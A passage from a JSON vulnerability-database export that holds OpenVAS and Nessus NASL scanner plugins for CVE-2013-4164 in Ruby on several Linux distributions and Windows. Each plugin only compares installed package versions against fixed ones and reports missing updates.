You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867350\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-03 20:03:00 +0530 (Mon, 03 Feb 2014)\");\n script_cve_id(\"CVE-2013-4164\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for ruby FEDORA-2013-22393\");\n script_tag(name:\"affected\", value:\"ruby on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-22393\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-December/123510.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.0.0.353~16.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-02-05T11:10:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4164"], "description": "Check for the Version of ruby", "modified": "2018-02-03T00:00:00", "published": "2013-11-26T00:00:00", "id": "OPENVAS:871087", "href": "http://plugins.openvas.org/nasl.php?oid=871087", "type": "openvas", "title": "RedHat Update for ruby RHSA-2013:1764-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for ruby RHSA-2013:1764-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(871087);\n script_version(\"$Revision: 8650 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-03 13:16:59 +0100 (Sat, 03 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-26 10:51:32 +0530 (Tue, 26 Nov 2013)\");\n script_cve_id(\"CVE-2013-4164\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"RedHat Update for ruby RHSA-2013:1764-01\");\n\n tag_insight = \"Ruby is an extensible, interpreted, object-oriented, scripting language.\nIt has features to process text files and to perform system management\ntasks.\n\nA buffer overflow flaw was found in the way Ruby parsed floating point\nnumbers from their text representation. If an application using Ruby\naccepted untrusted input strings and converted them to floating point\nnumbers, an attacker able to provide such input could cause the application\nto crash or, possibly, execute arbitrary code with the privileges of the\napplication. (CVE-2013-4164)\n\nAll ruby users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n\";\n\n tag_affected = \"ruby on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"RHSA\", value: \"2013:1764-01\");\n script_xref(name: \"URL\" , value: \"https://www.redhat.com/archives/rhsa-announce/2013-November/msg00043.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.7.352~13.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-debuginfo\", rpm:\"ruby-debuginfo~1.8.7.352~13.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.7.352~13.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~1.8.7.352~13.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.7.352~13.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-rdoc\", rpm:\"ruby-rdoc~1.8.7.352~13.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:48:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4164"], "description": "Check for the Version of ruby", "modified": "2017-07-10T00:00:00", "published": "2014-02-03T00:00:00", "id": "OPENVAS:867350", "href": "http://plugins.openvas.org/nasl.php?oid=867350", "type": "openvas", "title": "Fedora Update for ruby FEDORA-2013-22393", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for ruby FEDORA-2013-22393\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867350);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-03 20:03:00 +0530 (Mon, 03 Feb 2014)\");\n script_cve_id(\"CVE-2013-4164\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for ruby FEDORA-2013-22393\");\n\n tag_insight = \"Ruby is the interpreted scripting language for quick and easy\nobject-oriented programming. It has many features to process text\nfiles and to do system management tasks (as in Perl). It is simple,\nstraight-forward, and extensible.\n\";\n\n tag_affected = \"ruby on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-22393\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-December/123510.html\");\n script_summary(\"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.0.0.353~16.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-03-17T23:01:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4164"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120115", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120115", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2013-248)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120115\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:17:49 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2013-248)\");\n script_tag(name:\"insight\", value:\"Heap-based buffer overflow in Ruby 1.8, 1.9 before 1.9.3-p484, 2.0 before 2.0.0-p353, 2.1 before 2.1.0 preview2, and trunk before revision 43780 allows context-dependent attackers to cause a denial of service (segmentation fault) and possibly execute arbitrary code via a string that is converted to a floating point value, as demonstrated using (1) the to_f method or (2) JSON.parse.\");\n script_tag(name:\"solution\", value:\"Run yum update ruby to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2013-248.html\");\n script_cve_id(\"CVE-2013-4164\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"ruby-debuginfo\", rpm:\"ruby-debuginfo~1.8.7.374~2.11.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.7.374~2.11.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.7.374~2.11.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.7.374~2.11.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-static\", rpm:\"ruby-static~1.8.7.374~2.11.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-rdoc\", rpm:\"ruby-rdoc~1.8.7.374~2.11.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~1.8.7.374~2.11.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4164"], "description": "Oracle Linux Local Security Checks ELSA-2013-1764", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123518", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123518", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2013-1764", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-1764.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123518\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:04:57 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-1764\");\n script_tag(name:\"insight\", value:\"ELSA-2013-1764 - ruby security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-1764\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-1764.html\");\n script_cve_id(\"CVE-2013-4164\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.7.352~13.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.7.352~13.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.7.352~13.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~1.8.7.352~13.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.7.352~13.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-rdoc\", rpm:\"ruby-rdoc~1.8.7.352~13.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-ri\", rpm:\"ruby-ri~1.8.7.352~13.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-static\", rpm:\"ruby-static~1.8.7.352~13.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.7.352~13.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-21T22:00:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4164"], "description": "The host is installed with Ruby Interpreter and is prone to Heap Overflow\n Vulnerability.", "modified": "2020-07-14T00:00:00", "published": "2013-11-27T00:00:00", "id": "OPENVAS:1361412562310903502", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310903502", "type": "openvas", "title": "Ruby Interpreter Heap Overflow Vulnerability Nov13 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ruby Interpreter Heap Overflow Vulnerability Nov13 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:ruby-lang:ruby\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.903502\");\n script_version(\"2020-07-14T14:24:25+0000\");\n script_cve_id(\"CVE-2013-4164\");\n script_bugtraq_id(63873);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-07-14 14:24:25 +0000 (Tue, 14 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-11-27 20:39:27 +0530 (Wed, 27 Nov 2013)\");\n script_name(\"Ruby Interpreter Heap Overflow Vulnerability Nov13 (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Ruby Interpreter and is prone to Heap Overflow\n Vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 1.9.3 patchlevel 484, 2.0.0 patchlevel 353, or later.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to improper sanitization while processing user supplied\n input data during conversion of strings to floating point values.\");\n\n script_tag(name:\"affected\", value:\"Ruby Interpreter version 1.8, 1.9 before 1.9.3 Patchlevel 484, 2.0 before\n 2.0.0 Patchlevel 353.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attacker to cause denial of service\n or potentially the execution of arbitrary code.\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/55787\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/89191\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 SecPod\");\n script_family(\"General\");\n script_dependencies(\"gb_ruby_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ruby/detected\", \"Host/runs_windows\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(isnull(port = get_app_port(cpe:CPE)))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))\n exit(0);\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif(version_is_equal(version:version, test_version:\"1.8\") ||\n version_in_range(version:version, test_version:\"1.9\", test_version2:\"1.9.3.p483\") ||\n version_in_range(version:version, test_version:\"2.0\", test_version2:\"2.0.0.p352\")) {\n report = report_fixed_ver(installed_version:version, fixed_version:\"1.9.3-p483 / 2.0.0-p352\", install_path:location);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-12T10:11:26", "description": "An overflow in floating point number parsing was found in Ruby\ncurrently being shipped on Fedora 19. This vulnerability has been\nassigned the CVE identifier CVE-2013-4164.\n\nThis new rpm should fix this issue.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2013-12-11T00:00:00", "title": "Fedora 18 : ruby-1.9.3.484-32.fc18 (2013-22315)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4164"], "modified": "2013-12-11T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:ruby"], "id": "FEDORA_2013-22315.NASL", "href": "https://www.tenable.com/plugins/nessus/71328", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-22315.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71328);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-4164\");\n script_bugtraq_id(63873);\n script_xref(name:\"FEDORA\", value:\"2013-22315\");\n\n script_name(english:\"Fedora 18 : ruby-1.9.3.484-32.fc18 (2013-22315)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An overflow in floating point number parsing was found in Ruby\ncurrently being shipped on Fedora 19. This vulnerability has been\nassigned the CVE identifier CVE-2013-4164.\n\nThis new rpm should fix this issue.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1033546\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-December/123380.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a7db8df1\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/12/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"ruby-1.9.3.484-32.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:13:48", "description": "Updated ruby packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nRuby is an extensible, interpreted, object-oriented, scripting\nlanguage. It has features to process text files and to perform system\nmanagement tasks.\n\nA buffer overflow flaw was found in the way Ruby parsed floating point\nnumbers from their text representation. If an application using Ruby\naccepted untrusted input strings and converted them to floating point\nnumbers, an attacker able to provide such input could cause the\napplication to crash or, possibly, execute arbitrary code with the\nprivileges of the application. (CVE-2013-4164)\n\nAll ruby users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.", "edition": 24, "published": "2013-11-26T00:00:00", "title": "RHEL 6 : ruby (RHSA-2013:1764)", "type": "nessus", 